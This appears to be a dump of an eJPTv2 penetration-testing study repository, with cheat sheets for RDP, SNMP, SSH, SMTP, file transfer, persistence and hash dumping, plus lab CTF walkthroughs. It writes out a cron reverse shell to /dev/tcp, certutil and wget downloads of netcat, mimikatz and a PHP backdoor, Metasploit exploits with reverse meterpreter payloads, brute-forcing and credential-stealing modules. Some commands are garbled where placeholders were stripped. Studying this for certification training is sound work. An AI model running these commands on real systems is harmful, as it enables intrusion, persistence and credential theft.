30 | 31 | # Accessing RDP 32 | 33 | ```shell 34 | xfreerdp /u: /p: /v:: 35 | # Initiates a Remote Desktop Protocol (RDP) session to the target using provided credentials. 36 | # Useful for accessing Windows systems with RDP enabled. 37 | 38 | xfreerdp /v: /u:Administrator /cert:ignore 39 | # This command connects to the Remote Desktop Protocol (RDP) service on the target using the username Administrator with a blank password, while ignoring any certificate warnings. 40 | ``` 41 | 42 |
43 | 44 | # BlueKeep (CVE-2019-0708) 45 | 46 | ```shell 47 | use auxiliary/scanner/rdp/cve_2019_0708_bluekeep 48 | # Scans for systems vulnerable to BlueKeep (CVE-2019-0708), a critical RDP remote code execution flaw. 49 | # Affects unpatched Windows XP to Windows 7 and Windows Server 2003 to 2008 R2. 50 | 51 | use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 52 | # Exploits the BlueKeep vulnerability (CVE-2019-0708) to achieve remote code execution via RDP. 53 | # Targets unpatched Windows XP, 7, Server 2003, and 2008 (without Network Level Authentication). 54 | # WARNING: This exploit is unstable and may crash the target system. 55 | set RHOSTS 56 | set target 2 # Windows 7 SP1 / 2008 R2 (x64, VirtualBox 6) 57 | run 58 | ``` 59 | -------------------------------------------------------------------------------- /Course Notes Index.md: -------------------------------------------------------------------------------- 1 | # Course Notes Index 2 | 3 | ## Section 1 - Assessment Methodologies 4 | 5 | - 01 - [Information Gathering](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Course-Notes/01.%20Information%20Gathering.md) 6 | - 02 - [Footprinting & Scanning](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Course-Notes/02.%20Footprinting%20and%20Scanning.md) 7 | - 03 - [Enumeration](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Course-Notes/03.%20Enumeration.md) 8 | - 04 - [Vulnerability Assessment](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Course-Notes/04.%20Vulnerability%20Assessment.md) 9 | 10 | ## Section 2 - Host & Networking Auditing 11 | 12 | - 05 - [Auditing Fundamentals](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Course-Notes/05.%20Auditing%20Fundamentals.md) 13 | 14 | ## Section 3 - Host & Network Penetration Testing 15 | 16 | - 06a - [System & Host Based Attacks - Windows](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Course-Notes/06a.%20System%20Host%20Based%20Attacks%20-%20Windows.md) 17 | - 06b - [System & Host Based Attacks - Linux](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Course-Notes/06b.%20System%20%26%20Host%20Based%20Attacks%20-%20Linux.md) 18 | - 07 - [Network - Based Attacks](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Course-Notes/07.%20Network-Based%20Attacks.md) 19 | - 08 - [The Metasploit Framework (MSF)](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Course-Notes/08.%20The%20Metasploit%20Framework%20(MSF).md) 20 | - 09 - [Exploitation](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Course-Notes/09.%20Exploitation.md) 21 | - 10 - [Post - Exploitation](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Course-Notes/10.%20Post%20-%20Exploitation.md) 22 | - 11 - [Social Engineering](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Course-Notes/11.%20Social%20Engineering.md) 23 | 24 | ## Section 4 - Web Application Penetration Testing 25 | 26 | - 12 - [Introduction to the Web & HTTP Protocol](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Course-Notes/12.%20Introduction%20to%20the%20Web%20%26%20HTTP%20Protocol.md) 27 | -------------------------------------------------------------------------------- /Skill-Check/6. Host & Network Penetration Testing - System-Host Based Attacks CTF_2.md: -------------------------------------------------------------------------------- 1 | ## Host & Network Penetration Testing: System-Host Based Attacks CTF 2 2 | 3 | ## Questions and Resolutions 4 | 5 | ### Q1. Check the root (‘/’) directory for a file that might hold the key to the first flag on target1.ine.local. 6 | 7 | **Resolution:** 8 | - Scan the system using Nmap to identify open ports and services. 9 | - Discover open port 80 with a redirect to /browser.cgi. 10 | - Test for Shellshock vulnerability (Metasploit modules: scanner/http/apache_mod_cgi_bash_env and exploit/multi/http/apache_mod_cgi_bash_env_exec). 11 | - Set LHOST to your IP address, execute the exploit, and get a Meterpreter shell. 12 | - Upgrade shell with `/bin/bash -i`. 13 | - Navigate to `/` and list files with `ls` to find and read the flag with `cat`. 14 | 15 | ### Q2. In the server’s root directory, there might be something hidden. Explore ‘/opt/apache/htdocs/’ carefully to find the next flag on target1.ine.local. 16 | 17 | **Resolution:** 18 | - Go to `/opt/apache/htdocs/` and use `ls -la` to find hidden files. 19 | - Read discovered flag file with `cat`. 20 | 21 | ### Q3. Investigate the user’s home directory and consider using ‘libssh_auth_bypass’ to uncover the flag on target2.ine.local. 22 | 23 | **Resolution:** 24 | - Identify open port 22 running libssh 0.8.3 via Nmap. 25 | - Use Metasploit exploit: `exploit/linux/ssh/libssh_auth_bypass`. 26 | - Set RHOSTS and SPAWN_PTY, run the exploit, and open a shell session. 27 | - Navigate to `/home/user`, list contents with `ls`, and read the flag file with `cat`. 28 | 29 | ### Q4. The most restricted areas often hold the most valuable secrets. Look into the ‘/root’ directory to find the hidden flag on target2.ine.local. 30 | 31 | **Resolution:** 32 | - Attempt to access `/root`, but get "permission denied." 33 | - In `/home/user`, analyze files like `greetings` and `welcome` (binaries). 34 | - Use `file` and `strings` commands on binaries to discover privilege escalation paths. 35 | - Discover that `welcome` executes `greetings`. 36 | - Replace `greetings` with a payload (e.g., copy `/bin/bash` as `greetings`). 37 | - Run `./welcome` to escalate privileges to root. 38 | - Access `/root` and read the flag file. 39 | -------------------------------------------------------------------------------- /Cheat-Sheets/SNMP.md: -------------------------------------------------------------------------------- 1 | # SNMP 2 | 3 | **SNMP (Simple Network Management Protocol)** 4 | **Description**: Used to monitor and manage network devices (routers, switches, servers, printers) 5 | **Ports**: UDP port 161 (and port 162 for traps) 6 | 7 |
8 | 9 | # Enumeration with Nmap and snmpwalk 10 | 11 | ```shell 12 | nmap -Pn -sV 13 | nmap -sU -p 161 14 | 15 | # The UDP port 161 is open. This information is crucial for our following tasks: 16 | 17 | ls /usr/share/nmap/scripts/ | grep snmp 18 | ls -al /usr/share/nmap/scripts/ | grep snmp # -al > All files | Long listing format 19 | 20 | nmap -sU -sV -p 161 --script snmp-brute 21 | # As we can see, we found three community names: public, private, and secret 22 | # The script uses the snmpcommunities.lst list for brute-forcing it is located inside /usr/share/nmap/nselib/data/snmpcommunities.lst directory 23 | 24 | snmpwalk -v 1 -c public 25 | # This command uses SNMP (Simple Network Management Protocol) to query information from a network device (e.g., router, switch, printer, server). -v 1 is the SNMP version. 26 | # We were able to gather a lot of information via SNMP. However, the output may not be in a human-readable format. 27 | 28 | nmap -sU -p 161 --script snmp-* > snmp_output 29 | # The above command would run all the nmap SNMP scripts on the target machine and store its output to the snmp_output file. 30 | ls 31 | 32 | nmap -sU -p 161 --script snmp-win32-users 33 | # Attempts to enumerate Windows user accounts through SNMP 34 | # snmp-win32-users: Administrator, DefaultAccount, Guest, WDAGUtilityAccount, admin 35 | 36 | nmap -sU -p 161 --script snmp-* > snmp_output 37 | ``` 38 | 39 | - Now, let's run a brute-force attack using these windows users on SMB service. 40 | - Hydra successfully found a valid password for administrator and admin users. 41 | 42 | ```shell 43 | hydra -P snmp 44 | # Performs brute-force attack on SNMP by trying community strings from the provided wordlist. 45 | # Default SNMP port is 161 (UDP), but Hydra handles it automatically. 46 | # Common community strings to try: public, private, manager. 47 | ``` 48 | 49 | - *Run the `psexec` (smb) Metasploit exploit module to gain the meterpreter session using these credentials.* 50 | -------------------------------------------------------------------------------- /Cheat-Sheets/Persistence - Linux.md: -------------------------------------------------------------------------------- 1 | *To use the Metasploit persistence modules, we will first need to elevate our privileges on the Linux target.* 2 | 3 | # Persistence via SSH Keys 4 | 5 | ```shell 6 | use post/linux/manage/sshkey_persistence 7 | set SESSION 8 | set CREATESSHFOLDER true 9 | # We will now need to configure the module options, more specifically, we will need to set the SESSION ID and CREATESSHFOLDER options. 10 | # The module will add a public SSH key to the authorized_keys file in the home directory of all user and service accounts. 11 | 12 | # To use the private key, copy the key and save it as a new file, in this case, we will be saving it in the home directory of the root user on the Kali Linux system as ssh_key. 13 | cp ssh_key 14 | 15 | chmod 0400 ssh_key 16 | # We will then need to assign the appropriate permissions to the file. 17 | 18 | # We can now authenticate with the target using the private key via SSH 19 | ssh -i ssh_key root@ 20 | 21 | # Retrieve the flag 22 | ls -l 23 | cat flag.txt 24 | ``` 25 | 26 |
27 | 28 | # Persistence Via Cron Jobs 29 | 30 | Local Job Scheduling refers to the ability to create pre-scheduled and periodic background jobs using various mechanisms. Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. 31 | 32 | ```shell 33 | ssh student@ 34 | # Check the running processes 35 | ps -eaf # Cron service is running 36 | 37 | # Create a cron job which will use the SimpleHTTPServer python module to serve the files present in student user’s home directory 38 | echo "* * * * * cd /home/student/ && python -m SimpleHTTPServer" > cron 39 | crontab cron 40 | crontab -l 41 | 42 | # Exit the session. Login and delete the wait file 43 | ssh student@ 44 | rm wait 45 | 46 | # Retrieve the flag 47 | curl demo.ine.local:8000 48 | curl demo.ine.local:8000/flag.txt 49 | 50 | # Use nmap to scan for open ports. Since the HTTP server was started, port 8000 should be open. 51 | nmap -p- demo.ine.local 52 | 53 | # !! Alternative 54 | echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp//1234 0>&1'" > cron 55 | crontab cron 56 | crontab -l 57 | ls 58 | 59 | # Exit the session. Login and delete the wait file. 60 | ssh student@ 61 | rm wait 62 | 63 | # Retrieve the flag. 64 | nc -nvlp 1234 65 | ls -al 66 | cat flag.txt 67 | # This work every minute 68 | ``` 69 | -------------------------------------------------------------------------------- /Skill-Check/3. Assessment Methodologies - Enumeration.md: -------------------------------------------------------------------------------- 1 | ## Assessment Methodologies: Enumeration 2 | 3 | ## Questions and Resolutions 4 | 5 | ### Q1. There is a samba share that allows anonymous access. Wonder what’s in there! 6 | 7 | **Resolution:** 8 | Use enum4linux to determine which shares allow anonymous login. 9 | ```bash 10 | enum4linux -a target.ine.local 11 | ``` 12 | If no shares allow anonymous access, brute-force the shares using a script with a wordlist (example script below): 13 | 14 | ```bash 15 | #!/bin/bash 16 | TARGET="target.ine.local" 17 | WORDLIST="/root/Desktop/wordlists/shares.txt" 18 | while read -r SHARE; do 19 | smbclient //$TARGET/$SHARE -N -c "ls" &>/dev/null 20 | if [ $? -eq 0 ]; then 21 | echo "[+] Anonymous access allowed for: $SHARE" 22 | fi 23 | done < "$WORDLIST" 24 | ``` 25 | Once found, access the share: 26 | ```bash 27 | smbclient //target.ine.local/pubfiles -N 28 | ``` 29 | Download and read the file using `cat`. 30 | 31 | ### Q2. One of the samba users has a bad password. Their private share with the same name as their username is at risk! 32 | 33 | **Resolution:** 34 | Identify usernames using enum4linux (e.g., josh, bob, nancy, alice). Use Metasploit's smb_login module to enumerate weak passwords: 35 | - Set a users.txt file with these usernames. 36 | - Set a password wordlist as PASS_FILE. 37 | 38 | Example: 39 | ``` 40 | use auxiliary/scanner/smb/smb_login 41 | set USER_FILE users.txt 42 | set PASS_FILE /root/Desktop/wordlists/unix_passwords.txt 43 | set RHOSTS target.ine.local 44 | run 45 | ``` 46 | Once you discover valid credentials, log in: 47 | ```bash 48 | smbclient //target.ine.local/josh -U josh 49 | ``` 50 | Download and read the file. 51 | 52 | ### Q3. Follow the hint given in the previous flag to uncover this one. 53 | 54 | **Resolution:** 55 | If you find a hint about the FTP service, use nmap to check open ports: 56 | ```bash 57 | nmap -p- target.ine.local 58 | ``` 59 | If FTP is on a non-standard port (e.g., 5554), brute-force weak credentials with Hydra: 60 | ```bash 61 | hydra -L users.txt -P /root/Desktop/wordlists/unix_passwords.txt ftp://target.ine.local:5554 62 | ``` 63 | Log in with discovered credentials, download the file, and read its contents. 64 | 65 | ### Q4. This is a warning meant to deter unauthorized users from logging in. 66 | 67 | **Resolution:** 68 | Review nmap results to identify an SSH service. Try to connect and investigate banners or messages for further information. 69 | -------------------------------------------------------------------------------- /Cheat-Sheets/Transfer Files.md: -------------------------------------------------------------------------------- 1 | # Using Netcat 2 | 3 | **Server setup and Netcat transfer** 4 | 5 | ```shell 6 | cd /usr/share/windows-binaries 7 | 8 | # We can then setup an HTTP server with Python within this directory 9 | python -m SimpleHTTPServer 80 10 | python3 -m http.server 80 11 | 12 | # From the target Windows system, run via terminal the following command 13 | certutil -urlcache -f http:///nc.exe nc.exe 14 | 15 | # Now that we have Netcat setup on both systems, we can setup a Netcat listener on the Kali Linux system 16 | nc -nvlp 1234 17 | 18 | # We can now connect to the Netcat listener from the Windows Target system using the command line 19 | nc -nv 1234 20 | ``` 21 | 22 | Netcat can also be used to transfer files between a listener and a client. 23 | 24 | ```shell 25 | # To get started, we can create a file called test.txt on the Kali Linux system with some sample data by running the following command 26 | echo "Hello, this was sent over with Netcat" >> test.txt 27 | 28 | # We will now need to setup a Netcat listener on the recipient system, which in this case is the Windows system 29 | nc.exe -nvlp 1234 > test.txt 30 | 31 | # On the Kali Linux system, we will need to connect to the listener and send the contents of test.txt through the Netcat connection 32 | nc -nv 10.0.27.35 1234 < test.txt 33 | ``` 34 | 35 |
36 | 37 | # Transferring Files to Windows Targets 38 | 39 | ```shell 40 | # In this case, we will be transferring the mimikatz.exe executable found under the /usr/share/windows-resources/mimikatz/x64 directory on the Kali Linux system 41 | cd /usr/share/windows-resources/mimikatz/x64 42 | 43 | # We can then start a web server with Python3 in this directory 44 | python3 -m http.server 80 45 | 46 | # We can now navigate back to the meterpreter session on the target system, navigate to the C:\ drive and create the Temp directory 47 | cd C:\\ 48 | mkdir Temp 49 | cd Temp 50 | 51 | shell 52 | 53 | # We can now download the mimikatz.exe executable from the web server being hosted on the Kali Linux system 54 | certutil -urlcache -f http:///mimikatz.exe mimikatz.exe 55 | ``` 56 | 57 |
58 | 59 | # Transferring Files to Linux Targets 60 | 61 | ```shell 62 | # We will be transferring the php-backdoor.php file found under /usr/share/webshells/php/ directory on the Kali machine 63 | cd /usr/share/webshells/php/ 64 | python3 -m http.server 80 65 | 66 | # Navigate back to the command shell session on the target system and download the php-backdoor.php file from the web server being hosted on the Kali linux system 67 | wget http:///php-backdoor.php 68 | ``` 69 | 70 |
71 | 72 | # Useful file locations 73 | 74 | - /usr/share/windows-resources/mimikatz/x64 75 | - /usr/share/webshells/php/ 76 | -------------------------------------------------------------------------------- /Skill-Check/5. Host & Network Penetration Testing - System-Host Based Attacks CTF_1.md: -------------------------------------------------------------------------------- 1 | ## Host & Network Penetration Testing: System-Host Based Attacks 2 | 3 | ## Questions and Resolutions 4 | 5 | ### Q1. User ‘bob’ might not have chosen a strong password. Try common passwords to gain access to the server where the flag is located. (target1.ine.local) 6 | 7 | **Resolution:** 8 | - Perform a reconnaissance scan with Nmap: 9 | ```bash 10 | nmap -sC -sV target1.ine.local 11 | ``` 12 | - Notice port 80 is open with a 401 Unauthorized status. 13 | - Brute-force the password for user `bob` using Hydra: 14 | ```bash 15 | hydra -l bob -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt target1.ine.local http-get 16 | ``` 17 | - Log in and perform directory fuzzing with Dirb: 18 | ```bash 19 | dirb http://target1.ine.local -u bob: 20 | ``` 21 | - Discover and navigate to `/webdav` for the target. 22 | 23 | ### Q2. Valuable files are often on the C: drive. Explore it thoroughly. (target1.ine.local) 24 | 25 | **Resolution:** 26 | - Discover `.asp` file upload possibility (e.g., `test.asp`). 27 | - Enumerate file upload extensions with davtest: 28 | ```bash 29 | davtest -auth bob: -url http://target1.ine.local/webdav 30 | ``` 31 | - Upload a shell using cadaver: 32 | ```bash 33 | cadaver http://target1.ine.local/webdav 34 | put /usr/share/webshells/asp/webshell.asp 35 | ``` 36 | - Use the shell to access the C: drive and list contents: 37 | ```bash 38 | dir C:type C: lag2.txt 39 | ``` 40 | - Alternatively, use the Metasploit module `windows/iis/iis_upload_webdav_upload_asp`. 41 | 42 | ### Q3. By attempting to guess SMB user credentials, you may uncover important information that could lead you to the next flag. (target2.ine.local) 43 | 44 | **Resolution:** 45 | - Scan with Nmap for open SMB port (445). 46 | - Gather info with enum4linux (may be blocked). 47 | - Brute-force user and password using Hydra: 48 | ```bash 49 | hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt smb://target2.ine.local 50 | ``` 51 | - Access the SMB share for administrator: 52 | ```bash 53 | smbclient -L //target2.ine.local -U administrator 54 | ``` 55 | - Check share permissions with crackmapexec: 56 | ```bash 57 | crackmapexec smb target2.ine.local -u administrator -p --shares 58 | ``` 59 | - Connect to C$ and download flag: 60 | ```bash 61 | smbclient //target2.ine.local/C$ -U administrator 62 | dir 63 | get flag3.txt 64 | ``` 65 | 66 | ### Q4. The Desktop directory might have what you’re looking for. Enumerate its contents. (target2.ine.local) 67 | 68 | **Resolution:** 69 | - Navigate to the Administrator's Desktop: 70 | ```bash 71 | cd Users\Administrator\Desktop 72 | dir 73 | get flag4.txt 74 | ``` 75 | - Read the flag file locally with `cat`. 76 | 77 | -------------------------------------------------------------------------------- /Cheat-Sheets/Dumping Hashes - Linux.md: -------------------------------------------------------------------------------- 1 | # Password Cracker: Linux 2 | 3 | - `/etc/shadow` - This file contains hashed passwords for all local users. 4 | - `/etc/passwd` - Holds basic user info, but not the actual password hashes. 5 | 6 | **Use the post exploitation module to dump the system users hashes** 7 | 8 | ```shell 9 | use post/linux/gather/hashdump 10 | set SESSION 1 11 | exploit 12 | loot 13 | ``` 14 | 15 | **Run the auxiliary module to find the plain text password of the root user.** 16 | 17 | ```shell 18 | use auxiliary/analyze/crack_linux 19 | set SHA512 true 20 | run 21 | ``` 22 | 23 | The module does **not go out and find hashes by itself**. It depends on the fact that: 24 | 1. You (or a post-exploitation module) have already **dumped the hashes** (e.g., from `/etc/shadow`) 25 | 2. Metasploit **stored those hashes** in its internal database (via `loot`, `creds`, or `post modules`) 26 | 3. `analyze/crack_linux` reads those stored hashes and cracks them 27 | 28 | **Using John** 29 | 30 | ```shell 31 | john --format=sha512crypt --wordlist= 32 | john --format=sha512crypt /root/.msf4/loot/....shadow.txt --wordlist=/usr/share/wordlists/rockyou.txt 33 | ``` 34 | 35 |
36 | 37 | # Dumping Hashes and Enumeration with MSF modules 38 | 39 | ```shell 40 | use post/multi/gather/ssh_creds 41 | # Extracts stored SSH credentials (usernames, passwords, keys) from the target system. 42 | 43 | use post/multi/gather/docker_creds 44 | # Gathers Docker-related credentials and configuration files from the target. 45 | 46 | use post/linux/gather/hashdump 47 | set VERBOSE true 48 | # Dumps password hashes from the /etc/shadow file on a compromised Linux system. 49 | 50 | use post/linux/gather/ecryptfs_creds 51 | # Retrieves credentials and keys used for eCryptfs-encrypted home directories. 52 | 53 | use post/linux/gather/enum_psk 54 | # Enumerates pre-shared keys (PSKs) used in VPN or wireless configurations on Linux systems. 55 | 56 | post/linux/gather/enum_xchat 57 | set XCHAT true 58 | # Extracts stored credentials and logs from the XChat IRC client. 59 | 60 | use post/linux/gather/phpmyadmin_credsteal 61 | # Steals stored login credentials from phpMyAdmin configuration files. 62 | 63 | use post/linux/gather/pptpd_chap_secrets 64 | # Retrieves usernames and passwords from the PPTP VPN chap-secrets file. 65 | 66 | use post/linux/manage/sshkey_persistence 67 | # Installs an attacker-controlled SSH public key on the target to maintain persistent access. 68 | ``` 69 | 70 |
71 | 72 | # Cracking with Hashcat 73 | 74 | ```shell 75 | # Identify the correct mode for SHA-512 (Linux shadow format) 76 | hashcat --help | grep 1800 # 1800 = sha512crypt 77 | 78 | # Run Hashcat (mode 1800 for SHA-512, attack mode 0 for dictionary attack) 79 | hashcat -m 1800 -a 0 /root/.msf4/loot/...shadow.txt /usr/share/wordlists/rockyou.txt 80 | 81 | # Hashcat will display: : 82 | ``` 83 | -------------------------------------------------------------------------------- /Cheat-Sheets/SSH.md: -------------------------------------------------------------------------------- 1 | # SSH 2 | 3 | **SSH (Secure Shell)** 4 | **Description**: SSH (Secure Shell) is a protocol used for secure remote login and other secure network services over an insecure network 5 | **Ports**: TCP 22 6 | **Known Vulnerabilities**: Weak credentials (bruteforce), CVE-2018-10933 (libssh authentication bypass), Old OpenSSH vulnerabilities (user enumeration, remote code execution), Misconfigured "none" authentication, Trust relationships (keys without passwords) 7 | 8 |
9 | 10 | # Banner Grabbing / Initial Check 11 | 12 | ```shell 13 | nc 22 14 | # Opens a raw TCP connection to port 22 to manually grab the SSH banner and check if the service is alive. 15 | 16 | ssh @ 17 | # Attempts to initiate an SSH connection using the specified username. 18 | 19 | scp david@:"C:\\Users\\david\\" 20 | # Securely copies the file to the remote Windows target's David user folder using SCP. 21 | # Useful for uploading privilege escalation tools during post-exploitation. 22 | ``` 23 | 24 |
25 | 26 | # SSH Enumeration 27 | 28 | ```shell 29 | use auxiliary/scanner/ssh/ssh_version 30 | # Retrieves the SSH server version and banner information. 31 | 32 | use auxiliary/scanner/ssh/ssh_enumusers 33 | # Attempts to enumerate valid SSH usernames via timing-based or response-based analysis. 34 | 35 | nmap -p 22 --script ssh-enum-algos 36 | # Lists supported SSH encryption algorithms (key exchange, MAC, etc.). 37 | 38 | nmap -p 22 --script ssh-hostkey --script-args ssh_hostkey=full 39 | # Displays full SSH host key information, useful for fingerprinting and MITM detection. 40 | 41 | nmap -p 22 --script ssh-auth-methods --script-args="ssh.user=student" 42 | # Checks which authentication methods are allowed for the specified user (e.g., none, password, publickey). 43 | 44 | nmap -p 22 --script ssh-brute --script-args userdb=/root/users 45 | # Performs SSH brute-force attacks using a list of usernames. 46 | 47 | nmap -p 22 --script ssh-run --script-args="ssh-run.cmd=cat /home/student/FLAG,ssh-run.username=student,ssh-run.password=" 48 | # Attempts to run a command over SSH using provided credentials. 49 | ``` 50 | 51 |
52 | 53 | # SSH Brute-force Login 54 | 55 | ```shell 56 | hydra -L -P -t 4 ssh 57 | # Performs a brute-force attack on SSH using lists of usernames and passwords with 4 parallel threads. 58 | 59 | use auxiliary/scanner/ssh/ssh_login 60 | # Attempts SSH login with provided username and password combinations to identify valid credentials. 61 | ``` 62 | 63 |
64 | 65 | # Exploiting SSH Vulnerabilities 66 | 67 | ```shell 68 | use auxiliary/scanner/ssh/libssh_auth_bypass 69 | # Scans for systems vulnerable to the libssh authentication bypass (CVE-2018-10933). 70 | # Allows login without credentials if the server is improperly configured. 71 | set SPAWN_PTY true # Spawn a pseudo-terminal upon successful login 72 | ``` 73 | 74 | -------------------------------------------------------------------------------- /Cheat-Sheets/SMTP.md: -------------------------------------------------------------------------------- 1 | # SMTP 2 | 3 | **SMTP (Simple Mail Transfer Protocol)** 4 | **Description**: SMTP is the standard protocol used to send emails from a client to a mail server or between mail servers. It operates at the application layer of the OSI model. 5 | **Ports**: 25 (default, unencrypted, often blocked by ISPs), 587 (submission, supports STARTTLS encryption), 465 (deprecated, but still used for SMTP over SSL/TLS) 6 | **Known Vulnerabilities**: Server sends mail without auth — can be abused for spam, RCPT TO command used to check if user exists, Weak/no authentication, info disclosure in banners, Weak SMTP login creds 7 | 8 |
9 | 10 | # SMTP Enumeration 11 | 12 | ```shell 13 | nmap -sV --script banner 14 | # Grabs banner information from open ports to help identify running services and versions. 15 | 16 | nc 25 17 | # Opens a raw TCP connection to the SMTP service on port 25. 18 | 19 | VRFY admin@openmailbox.xyz 20 | VRFY commander@openmailbox.xyz 21 | # Checks if the specified email addresses exist on the SMTP server. 22 | 23 | telnet 25 24 | # Connects to the SMTP service using Telnet for manual interaction. 25 | 26 | HELO attacker.xyz 27 | EHLO attacker.xyz 28 | # Initiates an SMTP session with the target mail server; EHLO gives extended capabilities. 29 | 30 | smtp-user-enum -U /usr/share/commix/src/txt/usernames.txt -t 31 | # Enumerates valid SMTP users on the target using a given username list. 32 | 33 | use auxiliary/scanner/smtp/smtp_version 34 | # Identifies the SMTP server software and version. 35 | 36 | use auxiliary/scanner/smtp/smtp_enum 37 | # Attempts to enumerate valid users via SMTP VRFY, EXPN, or RCPT commands. 38 | 39 | sendemail -f admin@attacker.xyz -t root@openmailbox.xyz -s -u Fakemail -m "Hi root, a fake from admin" -o tls=no 40 | # Sends a spoofed email via the target SMTP server without TLS; useful for testing open relays or phishing simulations. 41 | ``` 42 | 43 |
44 | 45 | # Exploitation 46 | 47 | ```shell 48 | # Linux exploitation 49 | # Load the Haraka SMTP Exploit module in Metasploit 50 | use exploit/linux/smtp/haraka # (haraka < v2.8.9 is vulnerable) 51 | # Set the remote host (target SMTP server) that we want to exploit 52 | set RHOST 53 | # Set the local server port for handling incoming connections (Default is 9898) 54 | # This is necessary for receiving the reverse connection from the exploited target. 55 | set SRVPORT 9898 56 | # Specify the target email address to send the malicious payload 57 | # In this case, "root@attackdefense.test" is the intended recipient on the target SMTP server. 58 | set email_to root@attackdefense.test 59 | # Select the payload to be used in the exploit 60 | # We are using a Meterpreter reverse HTTP shell for a stable connection. 61 | set payload linux/x64/meterpreter_reverse_http 62 | # Define the local host (our attack machine) that will receive the reverse shell connection 63 | set LHOST 64 | # Execute the exploit and attempt to gain access to the target system 65 | exploit 66 | 67 | # Ignore any error you see, as you have already gained the meterpreter session. To list active sessions, run the following command: 68 | sessions 69 | sessions -i 1 70 | ``` 71 | -------------------------------------------------------------------------------- /Skill-Check.md: -------------------------------------------------------------------------------- 1 | **Assessment Methodologies** 2 | 3 | - [1. Assessment Methodologies - Information Gathering](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Skill-Check/1.%20Assessment%20Methodologies%20-%20Information%20Gathering.md) 4 | - [2. Assessment Methodologies - Footprinting and Scanning](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Skill-Check/2.%20Assessment%20Methodologies%20-%20Footprinting%20and%20Scanning.md) 5 | - [3. Assessment Methodologies - Enumeration](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Skill-Check/3.%20Assessment%20Methodologies%20-%20Enumeration.md) 6 | - [4. Assessment Methodologies - Vulnerability Assessment](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Skill-Check/4.%20Assessment%20Methodologies%20-%20Vulnerability%20Assessment.md) 7 | 8 | **Host & Network Penetration Testing** 9 | 10 | - [5. Host & Network Penetration Testing - System-Host Based Attacks CTF_1](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Skill-Check/5.%20Host%20%26%20Network%20Penetration%20Testing%20-%20System-Host%20Based%20Attacks%20CTF_1.md) 11 | - [6. Host & Network Penetration Testing - System-Host Based Attacks CTF_2](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Skill-Check/6.%20Host%20%26%20Network%20Penetration%20Testing%20-%20System-Host%20Based%20Attacks%20CTF_2.md) 12 | - [7. Host & Network Penetration Testing - Network-Based Attacks CTF_1](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Skill-Check/7.%20Host%20%26%20Network%20Penetration%20Testing%20-%20Network-Based%20Attacks%20CTF_1.md) 13 | - [8. Host & Network Penetration Testing - The Metasploit Framework CTF_1](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Skill-Check/8.%20Host%20%26%20Network%20Penetration%20Testing%20-%20The%20Metasploit%20Framework%20CTF_1.md) 14 | - [9. Host & Network Penetration Testing - The Metasploit Framework CTF_2](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Skill-Check/9.%20Host%20%26%20Network%20Penetration%20Testing%20-%20The%20Metasploit%20Framework%20CTF_2.md) 15 | - [10. Host & Network Penetration Testing - Exploitation CTF_1](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Skill-Check/10.%20Host%20%26%20Network%20Penetration%20Testing%20-%20Exploitation%20CTF_1.md) 16 | - [11. Host & Network Penetration Testing - Exploitation CTF_2](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Skill-Check/11.%20Host%20%26%20Network%20Penetration%20Testing%20-%20Exploitation%20CTF_2.md) 17 | - [12. Host & Network Penetration Testing - Exploitation CTF_3](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Skill-Check/12.%20Host%20%26%20Network%20Penetration%20Testing%20-%20Exploitation%20CTF_3.md) 18 | - [13. Host & Network Penetration Testing - Post-Exploitation CTF_1](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Skill-Check/13.%20Host%20%26%20Network%20Penetration%20Testing%20-%20Post-Exploitation%20CTF_1.md) 19 | - [14. Host & Network Penetration Testing - Post-Exploitation CTF_2](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Skill-Check/14.%20Host%20%26%20Network%20Penetration%20Testing%20-%20Post-Exploitation%20CTF_2.md) 20 | 21 | **Web Application Penetration Testing** 22 | 23 | - [15. Web Application Penetration Testing](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Skill-Check/15.%20Web%20Application%20Penetration%20Testing.md) 24 | 25 | 26 | -------------------------------------------------------------------------------- /eJPT - Cheat Sheets.md: -------------------------------------------------------------------------------- 1 | # eJPT Cheat Sheets 2 | 3 | #### **INDEX** 4 | 5 | 1. **Services and Protocols** 6 | - [FTP](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/FTP.md) 7 | - [HTTP](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/HTTP.md) 8 | - [RDP](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/RDP.md) 9 | - [SMB - SAMBA](https://github.com/vladvdg/eJPTv2-Resource-Pack/blob/main/Cheat-Sheets/SMB%20-%20SAMBA.md) 10 | - 